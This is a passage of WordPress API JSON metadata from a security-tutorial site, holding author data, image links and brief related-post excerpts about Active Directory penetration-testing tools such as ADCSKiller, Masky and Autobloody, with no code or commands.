K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/a\/AVvXsEg3sUJOtECI-8uHdvFxy8_2Su7ZusmuSNXs7txzYdzE0ixl3sEPfGaZBOzuE7IqilBuUIhA5fbO_II1c_QCD9lk7ymmVqdZn4GmvegOnvmtwFFvM0U_xFB8M0xfp-rk-y9DwQSNcGd7658SSS-T2WiSggfpCRJChlXwkaMeJaUWhvMXwfseA6IZ6nmN=s728","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":29971,"url":"https:\/\/kalilinuxtutorials.com\/adcskiller\/","url_meta":{"origin":20530,"position":0},"title":"ADCSKiller – An ADCS Exploitation Automation Tool","author":"Varshini","date":"September 4, 2023","format":false,"excerpt":"ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages the features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that the ADCSKiller is currently in its first draft and will undergo\u2026","rel":"","context":"In "Exploitation Tools"","block_context":{"text":"Exploitation Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/et\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi5SbFtT_UEIYRb7MB6E7WfcS-nZLP71KE7Gol-2BkqZx4cb3KXwCSsk9xBO9cJXmI_w_KYF9mgFTGSfQ-sG9DnWrr8mmql0TDtUD6eEJvqmGVJejC0320pTc8-TxNqXa3s_pRWcO83DJEV6SwHYc_UQjYbxdohSAaGqB7uq3exaYrijJhk3NEyDcsyYJno\/s16000\/OWASP%20WrongSecrets%20-%20Multi-Tenant%20CTF%20Party%20Setup%20%281%29.webp?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":36223,"url":"https:\/\/kalilinuxtutorials.com\/hackthebox-ad-machines\/","url_meta":{"origin":20530,"position":1},"title":"HackTheBox AD Machines : Tools And Strategies For Mastering AD Penetration Testing","author":"Varshini","date":"February 7, 2025","format":false,"excerpt":"HackTheBox (HTB) offers a range of Active Directory (AD) machines designed to help cybersecurity enthusiasts and professionals practice enumeration, exploitation, and attack techniques on AD environments. These machines vary in difficulty, providing challenges for both beginners and advanced users. Below is an overview of tools commonly used for tackling AD\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/HackTheBox-AD-Machines.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":26760,"url":"https:\/\/kalilinuxtutorials.com\/masky\/","url_meta":{"origin":20530,"position":2},"title":"Masky : Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS","author":"R K","date":"September 9, 2022","format":false,"excerpt":"Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope. This tool does not exploit\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi613ZRJi8M2dKw6VGvbn4P7TjfU9GiDsiM-WGtecg3AWHtJfklXdvAPtTFNGwSKEuQrXRW4zQjaTQNT3bZy6nFOSz-2sxe8uHxso5ar00gSzQADKFw68yYgGxQw_chr_uKIWUSL74Dl5f-NDvOToMN-Wqdp45YXO9UThShzn1m4u8DMZiVQ3rhUl4Y\/s728\/download.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":32058,"url":"https:\/\/kalilinuxtutorials.com\/linwinpwn-2\/","url_meta":{"origin":20530,"position":3},"title":"linWinPwn – Active Directory Vulnerability Scanner","author":"Varshini","date":"February 15, 2024","format":false,"excerpt":"A versatile bash script designed for automating Active Directory enumeration and vulnerability assessment. By leveraging a curated selection of tools and employing clever techniques like dynamic port forwarding, linWinPwn streamlines the process of gathering evidence in AD environments. Whether you're working against time constraints or aiming to minimize footprint, this\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEir68Esfbhp-tbg8DKcENoYMMWL1-QfkPn2T38qDrNrg7VjQDeHUr1Rfm2YNFa-PV6lMuNkOhyHERZPYc-bE18NIQN7Crm2vBugDaI8EcKk0xKTTzrRwP-nmb__nrEsH08MwtJ8bBw4F2Ifqwn9QapXykbg8xDXYTeU0XeMTxHXNFx04LV70yduDJ7uoTUT\/s16000\/Untitled%20design%20%2821%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":31774,"url":"https:\/\/kalilinuxtutorials.com\/gssapi-abuse\/","url_meta":{"origin":20530,"position":4},"title":"GSSAPI-Abuse : Leveraging Kerberos Stacks For Authentication Abuse","author":"Varshini","date":"January 22, 2024","format":false,"excerpt":"gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here:\u00a0A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active\u2026","rel":"","context":"In "Cyber security"","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg3L2mamKtUpUYzY9fDZb7mUlgHTLDgOmmLQ_2NYneqRST5B62kO4HUoLh5ZeFuFQsrZ0-pfDHpeOspZDLtkk2Z4URpEpqa59bgglsuzQO99S8-F02J79ygekL3ixP9R5d5i9viv2zftfhTOt4OJVkZOzjC2SymBOEKMnN69zTtR9ngxmdfycXqs1SU_yj4\/s16000\/Untitled%20design%20%281%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":28098,"url":"https:\/\/kalilinuxtutorials.com\/autobloody\/","url_meta":{"origin":20530,"position":5},"title":"Autobloody : Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound","author":"R K","date":"January 3, 2023","format":false,"excerpt":"Autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound. Description This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is\u2026","rel":"","context":"In "Kali Linux"","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEh7cWl56r2h8DBy_HcxWxzaTu1aElg-Vs3aDsV4nRODxfyId17snJbflkl55-vGRyJ9obbT4WHIdglszrNUHgBtSfYSYEgrqezqJ_oIxYIdLMXa6tv4jrsM7eOGWSxTeqrrQo9cY9dnsT7R-9wi-fmL1NM76elorCuYfYS06etmWth81r4AgK7rkPBq\/s728\/autobloody%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=20530"}],"version-history":[{"count":16,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530\/revisions"}],"predecessor-version":[{"id":20630,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/20530\/revisions\/20630"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/20546"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=20530"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=20530"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=20530"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}